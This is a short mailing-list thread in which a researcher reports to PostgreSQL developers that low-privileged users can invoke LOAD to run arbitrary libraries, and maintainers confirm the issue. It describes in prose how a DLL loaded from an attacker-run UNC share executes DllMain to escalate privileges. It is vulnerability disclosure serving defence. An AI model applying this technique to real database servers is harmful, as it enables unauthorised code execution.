Privilege escalation via LOAD
Hi guys,
It appears that low privileged users can invoke the LOAD extension to load
arbitrary libraries into the postgres process space. On Windows systems
this is achieved by calling LoadLibrary
(src/backend/port/dynloader/win32.c). The effect of this is that DllMain
will be executed. Since LOAD takes an absolute path, UNC paths may be
used on Windows, thus a low privileged database user can load an arbitrary
library from an anonymous share they have set up, escalating to the
privileges of the database user. I am still investigating the impact on
Unix.
Cheers
John
(this vulnerability was born out of a discussion on #postgresql
between myself, lurka and dennisb).
John Heasman <john@ngssoftware.com> writes:
It appears that low privileged users can invoke the LOAD extension to load
arbitrary libraries into the postgres process space.
Hmm. Creating C functions is restricted to superusers, but I guess no
one ever noticed that LOAD isn't. On a platform where that can execute
initialization functions this does seem like a security issue.
regards, tom lane
Tom Lane wrote:
John Heasman <john@ngssoftware.com> writes:
It appears that low privileged users can invoke the LOAD extension
to load arbitrary libraries into the postgres process space.Hmm. Creating C functions is restricted to superusers, but I guess
no one ever noticed that LOAD isn't. On a platform where that can
execute initialization functions this does seem like a security
issue.
I believe all ELF platforms fall into that category.
--
Peter Eisentraut
http://developer.postgresql.org/~petere/